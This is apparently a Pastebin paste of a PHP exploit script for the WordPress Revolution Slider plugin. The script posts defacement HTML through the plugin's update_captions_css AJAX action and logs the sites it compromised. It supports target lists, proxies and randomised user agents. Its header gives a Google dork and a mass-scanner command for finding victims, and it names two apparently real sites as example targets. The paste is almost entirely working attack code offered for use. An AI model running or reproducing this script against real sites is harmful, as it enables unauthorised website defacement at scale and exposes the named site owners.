Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- # Exploit Title: WORDPRESS Revslider Exploit (0DAY)
- # Google DORK: inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
- # EXECUTE:
- -t : SET TARGET.
- -f : SET FILE TARGETS.
- -p : SET PROXY
- Execute:
- php exploit.php -t target
- php exploit.php -f targets
- php exploit.php -t target -p 'http://localhost:9090'
- # USE MASS EXPLOIT SCANNER INURLBR
- ./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --command-all 'php inurl_revslider.php -t _TARGET_'
- # SCAN: https://github.com/googleinurl/SCANNER-INURLBR
- # PRINT: http://i.imgur.com/Fown6vf.png
- # Exemples target:
- http://victorylakeland.org/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
- http://ndcom.ru/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
- */
- error_reporting(1);
- set_time_limit(0);
- ini_set('display_errors', 1);
- ini_set('max_execution_time', 0);
- ini_set('allow_url_fopen', 1);
- ob_implicit_flush(true);
- ob_end_flush();
- $op_ = getopt('f:t:', array('help::'));
- echo "[+] [Exploit]: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL\n\n";
- $menu = "
- -t : SET TARGET.
- -f : SET FILE TARGETS.
- -p : SET PROXY
- Execute:
- php exploit.php -t target
- php exploit.php -f targets
- php exploit.php -t target -p 'http://localhost:9090'
- \n";
- echo isset($op_['help']) ? exit($menu) : NULL;
- $params = array(
- 'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
- 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
- 'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL,
- 'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: red'>[ Hacked By wordpress ]<br><marque>your email<p style='color: transparent'>",
- 'line' => "--------------------------------------------------------------"
- );
- not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
- not_isnull_empty($params['target']) ? __request($params) . exit() : NULL;
- not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
- function not_isnull_empty($valor = NULL) {
- RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
- }
- function __plus() {
- ob_flush();
- flush();
- }
- function __listTarget($file) {
- $tgt = file_get_contents($file['file']) . __plus();
- $tgt_ = explode("\r\n", $tgt) . __plus();
- echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
- foreach ($tgt_ as $url) {
- echo "\n[+] [INFO] SCANNING : {$url} \n";
- __plus();
- $file['target'] = $url;
- __request($file) . __plus();
- }
- }
- function __setUserAgentRandom() {
- $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
- 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse'
- );
- $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
- 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
- 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
- 'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu'
- );
- $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
- 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
- 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
- 'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
- 'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE'
- );
- return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
- }
- function __request($__) {
- $curlxpl = curl_init();
- curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
- (!is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL);
- curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
- curl_setopt($curlxpl, CURLOPT_POST, 1);
- curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => $__['deface']));
- curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
- curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
- $result = curl_exec($curlxpl) . __plus();
- if (eregi('true', $result)) {
- $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
- echo "[!] [INFO] Success Exploit!\n";
- echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
- __plus();
- file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
- } else {
- echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
- }
- curl_close($curlxpl);
- unset($curlxpl);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
